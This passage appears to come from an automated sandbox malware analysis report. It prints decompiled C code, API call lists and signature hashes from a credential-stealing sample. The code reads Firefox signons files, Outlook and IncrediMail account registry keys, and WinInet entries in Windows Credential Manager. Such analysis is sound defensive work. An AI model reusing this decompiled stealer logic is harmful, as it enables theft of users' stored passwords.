                                                                                					_t62 = strlen(_t68);
                                                                                					 *_t91 = "signons.txt";
                                                                                					_t9 = strlen(??) + 1; // 0x1
                                                                                					if(_t62 + _t9 >= 0x104) {
                                                                                						 *_t89 = 0;
                                                                                					} else {
                                                                                						E004062AD(_t89, _t86 + 0x158, "signons.txt");
                                                                                					}
                                                                                				}
                                                                                				_v268 = 0;
                                                                                				memset( &_v267, 0, 0x104);
                                                                                				_t40 = strlen(_t86 + 0x158);
                                                                                				_t91[3] = "signons.sqlite";
                                                                                				_t15 = strlen(??) + 1; // 0x1
                                                                                				_pop(_t73);
                                                                                				if(_t40 + _t15 >= 0x104) {
                                                                                					_v268 = 0;
                                                                                				} else {
                                                                                					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
                                                                                					_pop(_t73);
                                                                                				}
                                                                                				_t98 =  *_t89;
                                                                                				if( *_t89 != 0) {
                                                                                					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
                                                                                					_t99 = _t57;
                                                                                					if(_t57 != 0) {
                                                                                						E0040C475(_t73, _t86, _t99);
                                                                                					}
                                                                                				}
                                                                                				_t44 = E0040614B( &_v268);
                                                                                				_t100 = _t44;
                                                                                				_pop(_t74);
                                                                                				if(_t44 != 0) {
                                                                                					E0040CE28(_t74, _t100, _t86,  &_v268);
                                                                                				}
                                                                                				_t70 = 0;
                                                                                				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
                                                                                					L19:
                                                                                					return 1;
                                                                                				} else {
                                                                                					do {
                                                                                						_t90 = E0040D438(_t70, _t86 + 0x468);
                                                                                						_t24 = _t90 + 0x504; // 0x504
                                                                                						_t49 = _t24;
                                                                                						_push("none");
                                                                                						_push(_t49);
                                                                                						L004115B2();
                                                                                						if(_t49 != 0) {
                                                                                							_t25 = _t90 + 4; // 0x4
                                                                                							_t50 = _t25;
                                                                                							if( *_t50 == 0) {
                                                                                								_t26 = _t90 + 0x204; // 0x204
                                                                                								strcpy(_t50, _t26);
                                                                                							}
                                                                                							 *((intOrPtr*)( *_t86 + 4))(_t90);
                                                                                						}
                                                                                						_t70 = _t70 + 1;
                                                                                					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
                                                                                					goto L19;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                                  • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                                  • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                                  • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                                  • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                                  • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                                  • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                                  • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                                  • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                                  • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                                                • strlen.MSVCRT ref: 0040D241
                                                                                • strlen.MSVCRT ref: 0040D24F
                                                                                  • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                  • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                • memset.MSVCRT ref: 0040D28F
                                                                                • strlen.MSVCRT ref: 0040D29E
                                                                                • strlen.MSVCRT ref: 0040D2AC
                                                                                • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                                                • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                • String ID: none$signons.sqlite$signons.txt
                                                                                • API String ID: 2681923396-1088577317
                                                                                • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                                                • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                                                • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				int _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				void _v275;
                                                                                				char _v276;
                                                                                				void _v1299;
                                                                                				char _v1300;
                                                                                				void* __esi;
                                                                                				void* _t35;
                                                                                				intOrPtr _t36;
                                                                                				void* _t40;
                                                                                				void* _t52;
                                                                                				void* _t58;
                                                                                				void* _t60;
                                                                                				void* _t64;
                                                                                				char* _t66;
                                                                                				void* _t73;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                				void* _t83;
                                                                                
                                                                                				_t83 = __fp0;
                                                                                				_t64 = __ecx;
                                                                                				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
                                                                                				_t74 = _t73 + 0xc;
                                                                                				if(_t35 == 0) {
                                                                                					_v12 = 0;
                                                                                					_v276 = 0;
                                                                                					memset( &_v275, 0, 0xff);
                                                                                					_t40 = E0040EC05(_v8, 0,  &_v276);
                                                                                					_t75 = _t74 + 0x18;
                                                                                					if(_t40 == 0) {
                                                                                						_t66 = "%s\\%s";
                                                                                						do {
                                                                                							_t69 = _a4;
                                                                                							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                                                							_v1300 = 0;
                                                                                							memset( &_v1299, 0, 0x3ff);
                                                                                							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                                                							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
                                                                                							_t76 = _t75 + 0x3c;
                                                                                							_t80 = _t52;
                                                                                							if(_t52 == 0) {
                                                                                								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                                                							}
                                                                                							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                                                							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
                                                                                							_t77 = _t76 + 0x1c;
                                                                                							_t81 = _t58;
                                                                                							if(_t58 == 0) {
                                                                                								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
                                                                                							}
                                                                                							_v12 = _v12 + 1;
                                                                                							_t60 = E0040EC05(_v8, _v12,  &_v276);
                                                                                							_t75 = _t77 + 0xc;
                                                                                						} while (_t60 == 0);
                                                                                					}
                                                                                					RegCloseKey(_v8);
                                                                                				}
                                                                                				_t36 = _a4;
                                                                                				 *((char*)(_t36 + 0xa9c)) = 0;
                                                                                				return _t36;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 00402C84
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • memset.MSVCRT ref: 00402CDE
                                                                                • sprintf.MSVCRT ref: 00402CF7
                                                                                • sprintf.MSVCRT ref: 00402D35
                                                                                  • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                                  • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                • API String ID: 1831126014-3814494228
                                                                                • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                                                • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                                                • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                				void* _v8;
                                                                                				intOrPtr _v20;
                                                                                				void* _v24;
                                                                                				void* _v28;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				signed int _t45;
                                                                                				intOrPtr _t50;
                                                                                				signed int _t53;
                                                                                				intOrPtr _t82;
                                                                                				signed char _t86;
                                                                                				intOrPtr _t88;
                                                                                				intOrPtr _t90;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                
                                                                                				_t84 = __ecx;
                                                                                				_t88 = _a4;
                                                                                				_t92 = _t88 - 0x402;
                                                                                				_t91 = __ecx;
                                                                                				if(_t92 > 0) {
                                                                                					_t45 = _t88 - 0x415;
                                                                                					__eflags = _t45;
                                                                                					if(_t45 == 0) {
                                                                                						E0040A4C8(__ecx);
                                                                                						L22:
                                                                                						__eflags = 0;
                                                                                						E0040A27F(0, _t84, _t91, 0);
                                                                                						L23:
                                                                                						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
                                                                                							_t81 = _a12;
                                                                                							_t86 =  *(_a12 + 0xc);
                                                                                							_t50 =  *((intOrPtr*)(_t91 + 0x370));
                                                                                							if((_t86 & 0x00000008) == 0) {
                                                                                								__eflags = _t86 & 0x00000040;
                                                                                								if((_t86 & 0x00000040) != 0) {
                                                                                									 *0x4171ac =  *0x4171ac & 0x00000000;
                                                                                									__eflags =  *0x4171ac;
                                                                                									SetFocus( *(_t50 + 0x184));
                                                                                								}
                                                                                							} else {
                                                                                								E00409D7E(_t50, _t81);
                                                                                							}
                                                                                						}
                                                                                						return E004019AC(_t91, _t88, _a8, _a12);
                                                                                					}
                                                                                					_t53 = _t45 - 1;
                                                                                					__eflags = _t53;
                                                                                					if(_t53 == 0) {
                                                                                						E0040A56C(__ecx);
                                                                                						goto L22;
                                                                                					}
                                                                                					__eflags = _t53 == 6;
                                                                                					if(_t53 == 6) {
                                                                                						SetFocus( *(__ecx + 0x378));
                                                                                					}
                                                                                					goto L23;
                                                                                				}
                                                                                				if(_t92 == 0) {
                                                                                					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                                                					E0040A437(__ecx);
                                                                                					goto L22;
                                                                                				}
                                                                                				if(_t88 == 0x1c) {
                                                                                					__eflags = _a8;
                                                                                					if(_a8 == 0) {
                                                                                						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
                                                                                					} else {
                                                                                						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                                                					}
                                                                                					goto L23;
                                                                                				}
                                                                                				if(_t88 == 0x20) {
                                                                                					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                                                					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                						goto L23;
                                                                                					}
                                                                                					SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                                					return 1;
                                                                                				}
                                                                                				if(_t88 == 0x2b) {
                                                                                					_t82 = _a12;
                                                                                					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                                                					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                						SetBkMode( *(_t82 + 0x18), 1);
                                                                                						SetTextColor( *(_t82 + 0x18), 0xff0000);
                                                                                						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						asm("stosd");
                                                                                						_t90 = _a12;
                                                                                						_v28 = 0x14;
                                                                                						_v20 = 5;
                                                                                						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
                                                                                						SelectObject( *(_t90 + 0x18), _v8);
                                                                                						_t88 = _a4;
                                                                                					}
                                                                                				} else {
                                                                                					if(_t88 == 0x7b) {
                                                                                						_t87 = _a8;
                                                                                						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
                                                                                							E0040B372(__ecx, _t87);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				goto L23;
                                                                                			}

                                                                                APIs
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                  • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                                  • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                                  • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                • LoadCursorA.USER32 ref: 0040B63A
                                                                                • SetCursor.USER32(00000000), ref: 0040B641
                                                                                • PostMessageA.USER32 ref: 0040B663
                                                                                • SetFocus.USER32(?), ref: 0040B69E
                                                                                • SetFocus.USER32(?), ref: 0040B6EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                • String ID:
                                                                                • API String ID: 1416211542-0
                                                                                • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                				long _v8;
                                                                                				void* _v12;
                                                                                				long _v16;
                                                                                				void* _t14;
                                                                                				void* _t29;
                                                                                				void* _t34;
                                                                                				long _t36;
                                                                                
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				EmptyClipboard();
                                                                                				_t14 = E00405ECB(_a4);
                                                                                				_v12 = _t14;
                                                                                				if(_t14 == 0xffffffff) {
                                                                                					_v8 = GetLastError();
                                                                                				} else {
                                                                                					_t36 = GetFileSize(_t14, 0);
                                                                                					_t5 = _t36 + 1; // 0x1
                                                                                					_t29 = GlobalAlloc(0x2000, _t5);
                                                                                					if(_t29 == 0) {
                                                                                						L4:
                                                                                						_v8 = GetLastError();
                                                                                					} else {
                                                                                						_t34 = GlobalLock(_t29);
                                                                                						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
                                                                                							goto L4;
                                                                                						} else {
                                                                                							 *((char*)(_t34 + _t36)) = 0;
                                                                                							GlobalUnlock(_t29);
                                                                                							SetClipboardData(1, _t29);
                                                                                						}
                                                                                					}
                                                                                					CloseHandle(_v12);
                                                                                				}
                                                                                				CloseClipboard();
                                                                                				return _v8;
                                                                                			}










                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00405FD0
                                                                                  • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                                                • GlobalLock.KERNEL32 ref: 0040600B
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406036
                                                                                • GetLastError.KERNEL32 ref: 0040603E
                                                                                • CloseHandle.KERNEL32(?), ref: 0040604A
                                                                                • GetLastError.KERNEL32 ref: 00406055
                                                                                • CloseClipboard.USER32 ref: 0040605E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                • String ID:
                                                                                • API String ID: 3604893535-0
                                                                                • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                                                • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy
                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                • API String ID: 3177657795-318151290
                                                                                • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                                • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E0040765B(void* __eflags, intOrPtr* _a4) {
                                                                                				char _v532;
                                                                                				short _v534;
                                                                                				void _v1042;
                                                                                				void _v1044;
                                                                                				long _v1080;
                                                                                				intOrPtr _v1084;
                                                                                				intOrPtr _v1088;
                                                                                				intOrPtr _v1096;
                                                                                				int _v1104;
                                                                                				char _v1108;
                                                                                				intOrPtr _v1112;
                                                                                				intOrPtr _v1116;
                                                                                				intOrPtr _v1120;
                                                                                				intOrPtr _v1124;
                                                                                				intOrPtr _v1128;
                                                                                				intOrPtr _v1132;
                                                                                				long* _v1136;
                                                                                				wchar_t* _v1140;
                                                                                				wchar_t* _v1144;
                                                                                				intOrPtr _v1148;
                                                                                				char _v1152;
                                                                                				intOrPtr _v1156;
                                                                                				char _v1160;
                                                                                				void* _v1164;
                                                                                				void* _v1168;
                                                                                				int _v1172;
                                                                                				intOrPtr _v1176;
                                                                                				char _v1180;
                                                                                				char _v1184;
                                                                                				signed int _v1188;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t76;
                                                                                				int _t83;
                                                                                				wchar_t* _t109;
                                                                                				wchar_t* _t110;
                                                                                				signed int _t120;
                                                                                				int _t126;
                                                                                				void* _t129;
                                                                                				intOrPtr _t134;
                                                                                				signed int _t140;
                                                                                				void* _t142;
                                                                                				void* _t143;
                                                                                				void* _t144;
                                                                                
                                                                                				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
                                                                                				_push(_t129);
                                                                                				_v1108 = 0;
                                                                                				_v1104 = 0;
                                                                                				if(E00404647( &_v1108, _t129, __eflags) != 0) {
                                                                                					_v1184 = 0;
                                                                                					_v1180 = 0;
                                                                                					if(_v1088 == 0) {
                                                                                						_t76 = 0;
                                                                                						__eflags = 0;
                                                                                					} else {
                                                                                						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
                                                                                					}
                                                                                					if(_t76 != 0) {
                                                                                						_t120 = 9;
                                                                                						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
                                                                                						_t143 = _t142 + 0xc;
                                                                                						_v1172 = wcslen( &_v1080);
                                                                                						_v1176 = 1;
                                                                                						_v1188 = 0;
                                                                                						if(_v1180 > 0) {
                                                                                							while(_v1176 != 0) {
                                                                                								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
                                                                                								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
                                                                                								_t143 = _t143 + 0xc;
                                                                                								if(_t83 == 0) {
                                                                                									do {
                                                                                										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
                                                                                										 *(_t83 + 0x417968) =  *_t25 << 2;
                                                                                										_t83 = _t83 + 2;
                                                                                										_t152 = _t83 - 0x4a;
                                                                                									} while (_t83 < 0x4a);
                                                                                									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
                                                                                									_t139 =  &_v532;
                                                                                									_v1160 = 0x4a;
                                                                                									_v1156 = 0x417968;
                                                                                									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
                                                                                									E004046D7( &_v532);
                                                                                									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
                                                                                										_v1044 = 0;
                                                                                										memset( &_v1042, 0, 0x1fe);
                                                                                										_t126 = _v1168;
                                                                                										_t144 = _t143 + 0xc;
                                                                                										if(_t126 > 0x1fa) {
                                                                                											_t126 = 0x1fa;
                                                                                										}
                                                                                										memcpy( &_v1044, _v1164, _t126);
                                                                                										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
                                                                                										_v1124 =  *((intOrPtr*)(_t134 + 4));
                                                                                										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
                                                                                										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
                                                                                										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
                                                                                										_v1144 =  *(_t134 + 8);
                                                                                										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
                                                                                										_t109 =  &_v1044;
                                                                                										_v534 = 0;
                                                                                										_v1140 = _t109;
                                                                                										_v1136 = 0x4125f4;
                                                                                										_t110 = wcschr(_t109, 0x3a);
                                                                                										_t143 = _t144 + 0x14;
                                                                                										if(_t110 != 0) {
                                                                                											 *_t110 = 0;
                                                                                											_v1136 =  &(_t110[0]);
                                                                                										}
                                                                                										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                                                										LocalFree(_v1168);
                                                                                									}
                                                                                									E004047F1( &_v532);
                                                                                								}
                                                                                								_v1188 = _v1188 + 1;
                                                                                								if(_v1188 < _v1180) {
                                                                                									continue;
                                                                                								}
                                                                                								goto L18;
                                                                                							}
                                                                                						}
                                                                                						L18:
                                                                                						_v1096(_v1184);
                                                                                					}
                                                                                				}
                                                                                				return E004046C2( &_v1108);
                                                                                			}















































                                                                                APIs
                                                                                  • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                • wcslen.MSVCRT ref: 004076C5
                                                                                • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                                • memset.MSVCRT ref: 0040779D
                                                                                • memcpy.MSVCRT ref: 004077C1
                                                                                • wcschr.MSVCRT ref: 00407815
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                                  • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                • String ID: J$Microsoft_WinInet$hyA
                                                                                • API String ID: 2413121283-319027496
                                                                                • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                                • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
                                                                                				void* _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				void _v271;
                                                                                				char _v272;
                                                                                				void _v527;
                                                                                				char _v528;
                                                                                				void _v827;
                                                                                				char _v828;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				long _t40;
                                                                                				void* _t44;
                                                                                				void* _t55;
                                                                                				void* _t60;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				void* _t73;
                                                                                				void* _t74;
                                                                                				void* _t77;
                                                                                
                                                                                				_t77 = __fp0;
                                                                                				_t66 = __ecx;
                                                                                				_t67 = __eax;
                                                                                				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
                                                                                				_t72 = _t71 + 0xc;
                                                                                				if(_t40 == 0) {
                                                                                					_v12 = 0;
                                                                                					_v272 = 0;
                                                                                					memset( &_v271, 0, 0xff);
                                                                                					_t44 = E0040EC05(_a4, 0,  &_v272);
                                                                                					_t73 = _t72 + 0x18;
                                                                                					while(_t44 == 0) {
                                                                                						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
                                                                                						_v828 = 0;
                                                                                						memset( &_v827, 0, 0x12b);
                                                                                						sprintf( &_v828, "%s\\Accounts",  &_v272);
                                                                                						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
                                                                                						_t74 = _t73 + 0x38;
                                                                                						if(_t55 == 0) {
                                                                                							_v16 = 0;
                                                                                							_v528 = 0;
                                                                                							memset( &_v527, 0, 0xff);
                                                                                							_t60 = E0040EC05(_v8, 0,  &_v528);
                                                                                							_t74 = _t74 + 0x18;
                                                                                							while(_t60 == 0) {
                                                                                								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
                                                                                								_v16 = _v16 + 1;
                                                                                								_t60 = E0040EC05(_v8, _v16,  &_v528);
                                                                                								_t74 = _t74 + 0xc;
                                                                                							}
                                                                                							RegCloseKey(_v8);
                                                                                						}
                                                                                						_v12 = _v12 + 1;
                                                                                						_t44 = E0040EC05(_a4, _v12,  &_v272);
                                                                                						_t73 = _t74 + 0xc;
                                                                                					}
                                                                                					_t40 = RegCloseKey(_a4);
                                                                                				}
                                                                                				 *((char*)(_t67 + 0xa9c)) = 0;
                                                                                				return _t40;
                                                                                			}

